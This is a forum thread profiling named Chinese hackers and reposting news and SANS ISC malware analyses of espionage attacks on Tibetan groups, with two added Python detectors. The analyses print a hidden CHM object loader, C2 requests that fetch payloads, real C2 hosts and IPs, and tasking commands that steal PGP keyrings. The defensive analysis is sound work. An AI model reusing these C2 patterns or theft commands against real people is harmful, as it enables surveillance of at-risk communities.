A short excursion into Chinatown (continued)


Loo

There's already a thread about the Chinese hacker threat, and, well, with them everything is as always not like in the rest of the world. What they mean by their colour labels I still can't get my head around :o)) Let's start with the top hackers:

 

Real name: Gong Wei

Handle on the interwebs: Goodwell, Goodwill, Goodwil

Community: Green Army Corps isbase.net greenarmy.org/index.php

Age: 26

Best-known hack: Nothing special really, just very loud exploits for well-known forum engines, site engines, CMSes

Founder of Green Army Corps, member of RedHackerAlliance

http://www.greenarmy.org/webpic/cctv1.jpg

 

 

Real name: Wang Xianbing

Handle: Janker, Lonely Swordsman

janker.org

Age unknown

Studied at Zhenzhou University (that university's campus network is a scary place :o)). Graduated in 2002 with degrees in Automotive Design and Business Management. Initiator and coordinator of the 2000 conflict between Japanese and Chinese hackers. Supposedly also fought the Americans; how that ended is unclear. Came to show off on an IRC channel where a lot of our people hung out. Got humiliated (his shells were stolen, his machine trojaned) and a pile of unflattering info about him was published. Was one of the first security consultants for Chinese government organisations and banks. Moved around the Shenzhen, Guangzhou, Shanghai and Beijing area; as far as I understand, these are free economic zones. Aggressive, brazen, a racist (honest! that's the kind of Chinese racist he is :o))

 

Real name: Huang Xin

Handle: Glacier

Outfits: xfocus.org, blog.xfocus.net/index.php?blogId=15

Age: turned 30 in January

The best-known Chinese security software was written by him. A virus writer, in particular of the Glacier Trojan, and he also had a hand in X-scan

Studied at Xi'an Electronic Sci-Tech University. Was married to a girl with the handle Wollf, founder of the famous and most closed team W.O.L.F (at that time :o)). I was never let onto the team's site. Lived in Guangxi. Calm, confident, friendly, dangerous; he is the one they call the Godfather of virus writing in China. A very worthy person. Most likely works for the government (judging by many factors). I would rank him Top 1.

 

Real name: Zhang Xinghu

Handle: Flyingfox

Site: 54hack.org

Age: most likely around 20 now :o))

Founder of the China Youth Hackers Alliance. Boasted that he was a "technical security advisor for a police station"

 

And then there's 3800hk.com, a commercial organisation with a staff of nearly 50. They used to be 3800cc.com; to those in the know, the CC in the name says a lot. CC (Credit Card). The best-known hacker school in China. In 2003 he was the first to say in an interview that he had "done" the Pentagon. Invited the FBI to come and try to arrest him.

 

That's the public part of the Chinese hacker scene :o))


2 weeks later...

 

Chinese 'hacker' denies CNN report

 


The founder of a domestic hacker website has criticized a CNN report that claimed he was employed by the Chinese government to attack a United States government website, a Beijing newspaper reported today.

CNN claimed the central government has employed and paid several young operators of a website to "attack the world's most sensitive sites, including the Pentagon" in a report named "Chinese hackers: No site is safe" on March 7, Global Times said.

The CNN report said the interviewees, identified as Xiao Chen, admitted "they have hacked into the Pentagon and downloaded information," and was "paid secretly by the Chinese government" after doing so.

Xiao, the co-founder of Zhejiang-based website Hacker4.com for computer fans to exchange information, said he never said this to the journalist, said the Global Times, which is affiliated to People's Daily.

Shanghai Daily checked Hacker4.com and found most of its information concentrates on providing tips on how to prevent hacker attacks. It publicizes the loopholes of operating systems and teaches users how to recover from cyber viruses.

"The whole CNN report was groundless," Xiao Chen told the Global Times. They apparently wrote that for certain purposes, Xiao added. He spoke to Global Times to "clarify the case" after seeing the CNN report.

 

A journalist from CNN sent more than 20 e-mails to set up an interview with Xiao, saying he just wanted to introduce his website, said Xiao in the report.

But the journalist kept asking whether he had accessed the Pentagon's website and if the Chinese government paid them.

He denied answering any questions like that, the Global Times report said.

 

"I have never had access to any overseas website, let alone attacked one," Xiao told the newspaper.

 

 

The US Department of Defense claimed Chinese hackers always attacked its government website in the Chinese Military Report on March 4. However, US-based information security system company Symantec reported that most hackers were in the United States and China is one of the victim countries, the Global Times report said.

(Shanghai Daily, March 11, 2008)

 

http://www.china.org.cn/china/national/200...nt_12264393.htm

 

Pretty funny, really :o)) hack4 does defence, sort of officially. So who set him up is not very clear :o))


Police have rounded up 38 people accused of running a credit card fraud ring out of Queens for almost a decade. Officials say hackers in China and Ukraine have been breaking into the databases of major U.S. department stores, and then sending the credit card information of thousands of shoppers to the ringleader, Kwok Chow, 36, a Flushing resident known as ”Tony.”

 

The scam hit approximately 3,000 consumers and may have cost as much as $1 million. Tony allegedly used the data to churn out thousands of bogus cards, which were distributed to a team of shoppers who would buy high-end merchandise to be resold at a discount on a web site, Easttrades.com. (There are still lots of sweet deals there, too!) Tony's crew also used the data to generate fake driver's licenses, enabling them to purchase plane tickets under false identities, something Queens D.A. Richard Brown finds "particularly disturbing."

 

The arrests are the culmination of a 14-month probe, called House of Cards, which was initiated when a Flushing retailer spotted a fake driver’s license used by one of Chow's shoppers. After arresting that suspect, police began surveillance and tapped thousands of phone calls, which all had to be translated. And the overseas suspects are still at large; Commissioner Ray Kelly seemed none too optimistic about getting cooperation from the Chinese and Ukrainian governments: ”So far we haven't had much success at all.”

 

Last year police nabbed 13 people who were stealing credit card information from restaurant diners; the city's Department of Consumer Affairs has a lot of useful tips on how to guard against identity theft.

 

In short, the cops took down some Tony, whom they call the king of the criminal underworld among carders. Took him in Queens, in the States. And they "had" the whole American system any way they wanted and could :o))) Together with Ukrainian "comrades". That's the international we ended up with; funny that hackers have long been split into Russian and Ukrainian ones :o))


...they have the WTO any way they like, with counterfeit goods and without.

British police accused of stealing Russian software

"Recently we have started receiving reports from England that unlicensed software developed by Elecard is being used for pictures taken by automatic surveillance equipment," company president Andrey Pozdnyakov told Webplanet. According to him, this is not the first case of western pirates encroaching on Elecard's products.

Mr Pozdnyakov said the company usually gives away trial versions of its MPEG decoders for free on condition of non-commercial use for 21 days. After that period a ticker appears on the screen: "Evaluation period has expired. Please buy the Elecard MPEG Video decoder". After that any use of the decoder, even non-commercial, is prohibited.

That the British police are using the program after the end of the trial period became known from a letter one of the offenders sent to the company. "I was photographed on a bus-only road (Bath & North East Somerset area). As confirmation they sent me a picture which makes it clear it was taken with an unlicensed copy of the Elecard MPEG decoder (since it carried the notice about the trial period having expired).... They are using the demo version to make money," the letter says. "Recently received a penalty notice. The photograph carried the words: Evaluation period has expired. Please buy the Elecard MPEG Video decoder. Which apparently means that Camden Council used software with an expired period ...", writes another Briton.

According to Andrey Pozdnyakov, this is not the first case of western users abusing the trial version of the decoder. "A few years ago our unlicensed decoder was used by Adelphia (a cable TV provider in the USA). For a whole day the notice about unlicensed use of our codec went out live on air." Back then Elecard's support service was contacted by viewers who decided that they were the ones being asked to pay for the decoder.

"Usually in such a case the rights holder writes a letter to the offender demanding immediate payment for everything. From countries like England or the States the reply comes right away, something like: 'Sorry, an accidental mistake, we owe you for XXX copies, send us an invoice and we will pay immediately'," comments Mr Pozdnyakov. "In the case of the American provider they reacted to the letter immediately and paid for the codecs they owed." The offenders got off with a laughable sum, while the scandal brought around 100,000 visits to Elecard's site in a week.

Source


I really don't know what there is to hide here, but the file with this presentation keeps getting deleted everywhere. A review of attacks by the Chinese and a methodology for defending Chinese networks

China_Cyber___Fair_Use_1_.pdf


2 weeks later...

more information

_ttp://isc.sans.org/diary.html?n&storyid=4177

Cyber attacks against Tibetan communities

Published: 2008-03-21,

Last Updated: 2008-03-22 12:26:51 UTC

by Maarten Van Horenbeeck (Version: 4)

There is lots of media coverage on the protests in Tibet. Something that lies under the surface, and rarely gets a blip in the press, are the various targeted cyber attacks that have been taking place against these various communities recently.

 

These attacks are not limited to various Tibetan NGOs and support groups. They have been reported dating back to 2002, and even somewhat before that, and have affected several other communities, including Falun Gong and the Uyghurs.

 

The attacks generally start with a very trustworthy looking e-mail, being spoofed as originating from a known contact, to someone within a community. Some impressive social engineering tricks are used:

 

Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' is invoked between the reader's pre-existent beliefs and the statement. There's a natural urge to click on the attachment to confirm that belief;

The writing style of the purported sender is usually well researched to have the message look as believable as possible;

The content of the document actually matches closely what was discussed in the e-mail message;

Having legitimate, trusted, users actually forward along a message back into the community.

The messages contain an attachment which exploits a client side vulnerability. Generally these are:

 

CHM Help files with embedded objects;

Acrobat Reader PDF exploits;

Microsoft Office exploits;

LHA files exploiting vulnerabilities in WinRAR;

Exploitation of an ActiveX component through an attached HTML file.

Here's a sample attachment and its AV coverage at the time it was distributed:

 

reports_of_violence_in_tibet.ppt

MD5 977a4ac91acf5d88044a68f828154155

 

AhnLab-V3 2008.3.20.2 2008.03.20 -

AntiVir 7.6.0.75 2008.03.20 EXP/Office.Dropper.Gen

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.20 MPPT97:CVE-2006-3590

AVG 7.5.0.516 2008.03.20 -

BitDefender 7.2 2008.03.20 Exploit.PPT.Gen

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.20 -

DrWeb 4.44.0.09170 2008.03.20 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5629 2008.03.20 -

Ewido 4.0 2008.03.20 -

F-Prot 4.4.2.54 2008.03.19 File is damaged

F-Secure 6.70.13260.0 2008.03.20 -

FileAdvisor 1 2008.03.20 -

Fortinet 3.14.0.0 2008.03.20 -

Ikarus T3.1.1.20 2008.03.20 -

Kaspersky 7.0.0.125 2008.03.20 -

McAfee 5256 2008.03.20 -

Microsoft 1.3301 2008.03.20 -

NOD32v2 2964 2008.03.20 PP97M/TrojanDropper.Agent.NAI

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.20 -

Prevx1 V2 2008.03.20 -

Rising 20.36.32.00 2008.03.20 -

Sophos 4.27.0 2008.03.20 -

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.20 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.17 -

VirusBuster 4.3.26:9 2008.03.20 -

Webwasher-Gateway 6.6.2 2008.03.20 Exploit.Office.Dropper.Gen

 

As you can see, Anti virus is generally not proving effective against the samples distributed in this ongoing attack. We often see similar samples returning, only to have been edited slightly to prevent them from being picked up.

 

Most of the time, the samples then drop very raw trojans, not much restricted in ability. This means that only investigating the trojan does not always reveal the data targeted. To investigate, it's necessary to find out which commands were submitted. So far, we have uncovered attacks that specifically searched the file system for Word documents, e-mail contents and, most interestingly, PGP keyrings.

 

If you’re interested in this, you may like to read Crouching Powerpoint, Hidden Trojan, a presentation I gave earlier in the year on similar attacks against Falun Gong. Brian Krebs at the Washington Post has also written on the unfolding events. Mikko at F-Secure, Sophos and McAfee AVERT also have very interesting blog postings up on the topic.

 

We've been working with several groups on these attacks since early 2007. If you or your organization has also been targeted, now or in the past, please get in touch. We will not publish any data on your specific attacks without your permission.

 

--


and the continuation - http://isc.sans.org/diary.html?n&storyid=4177

 

This hopefully helps you identify the risk similar attacks would pose to your organization. The diary does not deal with one incident, but looks at overall findings.

1. The message

 

The sole goal of the message is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute.

 

Several social engineering tricks have been seen:

 

* Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' arises between the reader's pre-existent beliefs and the statement. This urges the reader to click the message;

* The writing style of the purported sender is well researched and mimicked;

* The content of the document matches the topic of the e-mail message;

* Legitimate, trusted, users are sometimes convinced to actually forward along a message back to specific targets;

* In a number of cases, "memes" distributed within the community have been reused. For instance, a "viral" Word document was grabbed from a forum, edited to include the exploit and Trojan code, and forwarded on to other members of the community.

 

Here’s a sample. This message was sent to someone very active within the Tibetan community, and was spoofed as originating from the Secretary of International Relations of the Central Tibetan Administration, the government in exile in Dharamshala, India. The name and contact details of the official were accurate:

 

All,

 

Attached here is the update Human Rights Report on Tibet issued by

Department of State of U.S.A on March 11, 2008.

 

You may also visit the site:

 

Tashi Deleg,

 

Sonam Dagpo

 

Secretary of International Relations

Department of Information & International Relations

Central Tibetan Administration

Dharamshala -176215

H.P., INDIA

Ph.: [obfuscated]

Fax: [obfuscated]

E-mail: [obfuscated]@gov.tibet.net or diir-pa@gov.tibet.net

Website: http://www.tibet.net/en/diir/

 

 

In some cases, messages were sent which addressed the recipient by his first name, and provided “clarification on a topic” which had previously been discussed between the sender and the recipient. While not evidence, there are specific instances in which it appears previously compromised accounts were re-used to engage in better social engineering.

2. The exploit

 

The messages contain an attachment which exploits a client side vulnerability. The most common vectors so far have been:

 

* CHM Help files with embedded objects;

* CVE-2008-0655: Acrobat Reader PDF exploit

* CVE-2006-2492, CVE-2007-3899: Word

* CVE-2006-3590, CVE-2006-0009: Powerpoint

* CVE-2008-0081: Excel

* CVE-2005-0944: Microsoft Access

* CVE-2006-3845: LHA files exploiting vulnerabilities in WinRAR.

 

The file exploits the vulnerability, and executes shellcode which generally unpacks at least two embedded components:

 

* The actual Trojan binary: Which can be packed (using UPX, Armadillo, FSG or PE-ARMOR), but in most cases is unpacked and easily retrievable from the file. It is described further in chapter 3 of this diary entry.

* A benign, non-malicious document of the same file type: upon successful execution of the exploit code, it generally “cleans up” and instead of showing an indication that the application has crashed, it drops a clean file to disk (be it either RAR, DOC, PPT or any of the other files affected) and opens it.

 

The second file shows context very valid to the message initially sent. An example image is included for reference below. This was grabbed from what was sent as a promotional flyer on a book on Tibet. In the background, it dropped a Trojan. Both the flyer and the book exist in real-life form, unbugged. This was an example of taking something which "exists" within the community, and republishing it with trojaned contents.

 

These files usually have very low AV coverage. Below is sample Virustotal output for the malicious PDF sample:

 

China’s Tibet.pdf

MD5 70d0d15041a14adaff614f0b7bf8c428

 

AhnLab-V3 2008.3.22.1 2008.03.21 -

AntiVir 7.6.0.75 2008.03.21 -

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.21 -

AVG 7.5.0.516 2008.03.21 -

BitDefender 7.2 2008.03.21 -

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.21 -

DrWeb 4.44.0.09170 2008.03.21 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5631 2008.03.21 -

Ewido 4.0 2008.03.21 -

F-Prot 4.4.2.54 2008.03.20 -

F-Secure 6.70.13260.0 2008.03.21 -

FileAdvisor 1 2008.03.21 -

Fortinet 3.14.0.0 2008.03.21 -

Ikarus T3.1.1.20 2008.03.21 -

Kaspersky 7.0.0.125 2008.03.21 -

McAfee 5257 2008.03.21 -

Microsoft 1.3301 2008.03.21 -

NOD32v2 2966 2008.03.21 -

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.21 -

Prevx1 V2 2008.03.21 -

Rising 20.36.42.00 2008.03.21 -

Sophos 4.27.0 2008.03.21 Mal/JSShell-B

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.21 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.21 -

VirusBuster 4.3.26:9 2008.03.21 Exploit.PDF.A

Webwasher-Gateway 6.6.2 2008.03.21 Exploit.PDF.ZoneBac.gen (suspicious)

 

 

3. The backdoor

 

Upon successful exploitation, the dropper installs a Trojan. We have monitored over 8 different Trojan families in use. Quite common are Enfal, Riler and Protux. In addition, control over some machines is maintained using the Gh0st RAT remote access tool.

 

These trojans generally allow close to unrestricted access to the system under the user account which installed the Trojan. Many machines involved in this incident are home desktops, as such this is often the administrator account. The Backdoor generally triggers a few generic signatures, but has very low AV coverage at the time of distribution.

 

Below is a sample extracted from a malicious Excel document:

 

event_0310_result.exe

MD5 7d62cec8f022e9599885ad7d079d2f60

 

AhnLab-V3 2008.3.4.0/20080310 found nothing

AntiVir 7.6.0.73/20080310 found [HEUR/Malware]

Authentium 4.93.8/20080307 found nothing

Avast 4.7.1098.0/20080309 found nothing

AVG 7.5.0.516/20080310 found nothing

BitDefender 7.2/20080310 found nothing

CAT-QuickHeal 9.50/20080308 found nothing

ClamAV None/20080310 found nothing

DrWeb 4.44.0.09170/20080310 found nothing

eSafe 7.0.15.0/20080309 found nothing

eTrust-Vet 31.3.5597/20080307 found nothing

Ewido 4.0/20080310 found nothing

F-Prot 4.4.2.54/20080309 found nothing

F-Secure 6.70.13260.0/20080310 found [suspicious:W32/Malware!Gemini]

FileAdvisor 1/20080310 found nothing

Fortinet 3.14.0.0/20080310 found nothing

Ikarus T3.1.1.20/20080310 found nothing

Kaspersky 7.0.0.125/20080310 found nothing

McAfee 5247/20080307 found nothing

Microsoft 1.3301/20080310 found nothing

NOD32v2 2935/20080310 found nothing

Norman 5.80.02/20080307 found nothing

Panda 9.0.0.4/20080309 found nothing

Prevx1 V2/20080310 found [Heuristic: Suspicious Self Modifying File]

Rising 20.35.02.00/20080310 found nothing

Sophos 4.27.0/20080310 found [Mal/Behav-116]

Sunbelt 3.0.930.0/20080305 found nothing

Symantec 10/20080310 found nothing

TheHacker 6.2.92.239/20080309 found nothing

VBA32 3.12.6.2/20080305 found nothing

VirusBuster 4.3.26:9/20080309 found nothing

Webwasher-Gateway 6.6.2/20080310 found [Heuristic.Malware]

 

 

4. The control connection

 

In order for the Trojan to be effective, it needs to “phone home”. This usually (but not always) consists of two steps:

 

* A DNS lookup to acquire the address of the control server;

* The actual connection.

 

The DNS lookup occurs for a hostname embedded in the Trojan. So far, we have tracked over 50 unique hostnames. Some are used against a single organization or individual, others are used across the spectrum to many different targets.

 

Interestingly, attacks are “timed”. Let’s look at some DNS resolution logs:

 

+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242

+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242

 

When the hostname resolves to one of the above IP addresses, a connection is set up. When it resolves to 127.0.0.1, however, the compromised machine no longer connects out.

 

As several IDS rules are available to trigger on lookups that result in 127.0.0.1, we are also seeing samples that contain a check for a specific ‘code’ IP. When the control server resolves to this address, the Trojan holds for a few minutes, then does another lookup. These “parking addresses” have included 43.44.43.44 and 63.64.63.64.

 

In the above example, this indicates that the team behind these attacks was busy gathering data from 06:05 till 15:07, only to start again almost exactly one day later, 07:18.

 

In a few cases, the control connection has been regular HTTP or HTTPS, set up using code injected into the Internet Explorer process. This allows the Trojan to be proxy-aware. In other instances, there have been control connections that were fully binary (such as Gh0st RAT) or encrypted using an obvious XOR key.

 

Some control connections can be detected on the network or proxy level, such as those of certain Riler and Enfal families:

 

When started, Enfal issues HTTP POST requests to the controller for:

 

/cgi-bin/Owpq4.cgi

/cgi-bin/Fupq9.cgi

 

The Riler Trojan family can also be identified through its connection protocol (bold is the infected client submitting data):

 

NAME:

NAME: [hostname].VER: Stealth 2.6 MARK: fl510 OS: NT 5.0.L_IP: 10.2.0.18.ID: NoID.

LONG:0501_LOG.txt

NULL

AUTO

ERR code = 02

SNIF

ERR code = 02

WAKE

WAKE

 

It also has a recognizable command set:

 

LOCK SEND WAKE NAME MOON KEEP DISK FILE

DONE DOWN LONG MAKE ATTR KILL LIKE SEEK

READ DEAD DDLL AUTO READY

 

 

5. The control server

 

The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.

 

At the moment, it appears at least a number of the control servers have been compromised using open Terminal Services (RDP/3389) combined with weak passwords.

 

 

 

Based on the technical data, it is impossible to say who is the culprit in these attacks. What is however clear is that these NGOs are systematically hampered using malicious code, either with the goal of gaining access to their communications, or of making them reluctant to use e-mail to begin with.

 

While this is not the full picture on the attacks, we hope this overview already proves useful, and please get in touch if you have questions or additional feedback.

 

Cheers,

 

Maarten Van Horenbeeck

Maarten at daemon.be

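The timed DNS switching described in section 4 above (the control hostname flipping between a routable address and 127.0.0.1, or one of the "parking" addresses) can be pulled out of passive-DNS change logs automatically. The following is an added example, not code from the diary or from the ISC: it parses change lines in the same "+ / -" format quoted above, treats 127.0.0.1 and the two parking addresses the diary names as "do not connect" answers, reconstructs the windows during which each control server was reachable, and lists the hostnames that show the on/off pattern at all. The sample log embeds the eight dns3.westcowboy.com lines from the post plus three constructed entries for two hypothetical hostnames, using RFC 5737 documentation addresses; those extra hosts and addresses are assumptions for illustration only.

```python
import re
from collections import defaultdict
from datetime import datetime

# Answers that mean "do not connect": loopback, plus the "parking" addresses the
# diary reports (43.44.43.44, 63.64.63.64). Extend from your own observations.
OFF_ANSWERS = {"127.0.0.1"}
PARKING_ANSWERS = {"43.44.43.44", "63.64.63.64"}

# "+" = answer added, "-" = answer withdrawn, in the passive-DNS diff format quoted above
LINE_RE = re.compile(
    r"^([+-])\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2})\s*\|\s*(\S+)\s*\|\s*(\S+)\s*$"
)

# Constructed sample: the eight dns3.westcowboy.com lines quoted in the diary, plus
# one hypothetical host parked on a "code" address and one ordinary host
# (hostnames and addresses for those two are made up, RFC 5737 ranges).
SAMPLE_LOG = """\
+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-22 08:00 | updates.example.org | 198.51.100.7
+ 2008-03-22 10:00 | c2-parked.example.invalid | 43.44.43.44
+ 2008-03-22 11:30 | c2-parked.example.invalid | 203.0.113.10
- 2008-03-22 11:30 | c2-parked.example.invalid | 43.44.43.44
+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242
+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242
- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1
+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1
- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242
"""


def parse_events(lines):
    """Return (sign, timestamp, hostname, answer) tuples, skipping malformed lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            sign, ts, host, answer = m.groups()
            events.append((sign, datetime.strptime(ts, "%Y-%m-%d %H:%M"), host, answer))
    return events


def classify(answer):
    """'off' for loopback, 'parked' for a hold address, 'active' for anything routable."""
    if answer in OFF_ANSWERS:
        return "off"
    if answer in PARKING_ANSWERS:
        return "parked"
    return "active"


def activity_windows(events):
    """Per hostname, the (start, end, address) intervals during which it resolved to
    a routable address. Only '+' lines change the current answer; a '+' to loopback
    or a parking address closes the open window. end is None if still active."""
    windows = defaultdict(list)
    open_since = {}
    for sign, ts, host, answer in sorted(events, key=lambda e: e[1]):
        if sign != "+":
            continue
        state = classify(answer)
        if state == "active" and host not in open_since:
            open_since[host] = (ts, answer)
        elif state != "active" and host in open_since:
            start, addr = open_since.pop(host)
            windows[host].append((start, ts, addr))
    for host, (start, addr) in open_since.items():
        windows[host].append((start, None, addr))
    return dict(windows)


def switching_hosts(events):
    """Hostnames that have resolved both to a routable address and to an off/parking
    answer: the operator-controlled on/off pattern the diary describes."""
    states = defaultdict(set)
    for sign, _, host, answer in events:
        if sign == "+":
            states[host].add(classify(answer))
    return sorted(h for h, s in states.items() if "active" in s and s & {"off", "parked"})


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG.splitlines())
    for host in switching_hosts(ev):
        for start, end, addr in activity_windows(ev)[host]:
            print(host, addr, start, "->", end or "still active")
```

Run against the sample, the westcowboy hostname yields exactly the two collection windows the diary reads off by hand (06:05 to 15:07, then 07:18 to 09:54 the next day), and the parked host is reported alongside it although it never touched 127.0.0.1, which is the case a loopback-only IDS rule would miss.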

and here is how PGP keys get stolen ;-)

 

_ttp://isc.sans.org/diary.html?n&storyid=4207

 

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27,

Last Updated: 2008-03-27 09:07:04 UTC

by Maarten Van Horenbeeck (Version: 1)


 

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

 

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

 

<object width="0" height="0" style="display:none;"
type="application/x-oleobject" codebase="music.exe">

 

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

 

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

 

When you see something like this, it raises the suspicion that the UID is in fact a 'command' to a control server. In reality, the web server turned out not to be a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

 

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

 

<Command Begin>

netmgetr usb:\*.doc

netmgetr usb:\*.pkr

netmgetr usb:\*.skr

netlsr usb:\*.*

<Command End>

 

Upon further review of the trojan code, netmgetr scans the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the '99 Caligula macro-virus, but that was more proof-of-concept code.

 

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to ”map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

 

There are two things we can learn from this:

 

* It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";

* When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

 

Cheers,

 

Maarten Van Horenbeeck

maarten at daemon.be

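The network artefacts this diary gives (the registration request GET /scripts/msadce.exe/?UID=... HTTP/1.0 and the BASE64-encoded <Command Begin> ... <Command End> tasking), together with the Enfal POST paths and the Riler hello line quoted in the previous post, are all matchable on a proxy or in captured traffic. The following is an added example, not code from the diaries or the ISC: it labels request lines by the family they belong to, decodes a tasking response into (verb, target) pairs, and summarises what the tasking is after, in particular PGP keyrings (.pkr/.skr) and removable media. The sample response is constructed here by base64-encoding the four command lines quoted in the post; the reading of netmgetr as "get files matching a pattern" and netlsr as "list directory" follows the post's own description, and the Riler hello used in the test is a made-up hostname slotted into the banner format shown above.

```python
import base64
import binascii
import re

# Registration request sent by both the first-stage and the second-stage payload
REGISTRATION_RE = re.compile(r"^GET /scripts/msadce\.exe/\?UID=[A-Za-z0-9]+ HTTP/1\.[01]$")
# Enfal check-in paths and the Riler hello line, from the earlier diary entry
ENFAL_PATHS = ("/cgi-bin/Owpq4.cgi", "/cgi-bin/Fupq9.cgi")
RILER_HELLO_RE = re.compile(r"^NAME: \S+\.VER: Stealth \d+\.\d+ MARK: ")

TASKING_RE = re.compile(r"<Command Begin>(.*?)<Command End>", re.S)
COMMAND_RE = re.compile(r"^(\w+)\s+(\S+)$")
KEYRING_EXTENSIONS = (".pkr", ".skr")   # PGP public / secret keyrings


def classify_request_line(line):
    """Label a request line (or the first line of a client hello) by known family,
    or return None when it matches nothing we know."""
    line = line.strip()
    if REGISTRATION_RE.match(line):
        return "chm-dropper-registration"
    parts = line.split()
    if len(parts) >= 2 and parts[0] == "POST" and parts[1] in ENFAL_PATHS:
        return "enfal-checkin"
    if RILER_HELLO_RE.match(line):
        return "riler-hello"
    return None


def decode_tasking(b64_body):
    """Decode a BASE64 response body and return the [(verb, target), ...] found
    inside the tasking block. Returns [] for undecodable bodies and for responses
    without a block (for example the second-stage binary download)."""
    try:
        text = base64.b64decode(b64_body, validate=True).decode("ascii", "replace")
    except (ValueError, binascii.Error):
        return []
    m = TASKING_RE.search(text)
    if not m:
        return []
    commands = []
    for raw in m.group(1).splitlines():
        raw = raw.strip()
        if not raw:
            continue
        cm = COMMAND_RE.match(raw)
        commands.append((cm.group(1), cm.group(2)) if cm else ("?", raw))
    return commands


def assess_tasking(commands):
    """Summarise what the tasking collects; keyring theft is the finding that matters."""
    findings = set()
    for verb, target in commands:
        t = target.lower()
        if verb == "netmgetr" and t.endswith(KEYRING_EXTENSIONS):
            findings.add("pgp-keyring-collection")
        elif verb == "netmgetr" and t.endswith(".doc"):
            findings.add("document-collection")
        elif verb == "netlsr":
            findings.add("directory-listing")
        if t.startswith("usb:"):
            findings.add("removable-media")
    return sorted(findings)


# Constructed sample: the tasking quoted in the diary, encoded the way the server sent it
SAMPLE_TASKING_B64 = base64.b64encode(
    b"<Command Begin>\r\n"
    b"netmgetr usb:\\*.doc\r\n"
    b"netmgetr usb:\\*.pkr\r\n"
    b"netmgetr usb:\\*.skr\r\n"
    b"netlsr usb:\\*.*\r\n"
    b"<Command End>"
).decode("ascii")

if __name__ == "__main__":
    print(classify_request_line("GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0"))
    cmds = decode_tasking(SAMPLE_TASKING_B64)
    print(cmds, assess_tasking(cmds))
```

The registration match is deliberately exact: the diary notes the fake server dropped any other query, so a request line that differs from this shape is not this family. The keyring check is the one to keep even if everything else changes, since it is the collection of .pkr/.skr files, not the transport, that tells you the attacker is mapping who talks to whom encrypted.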
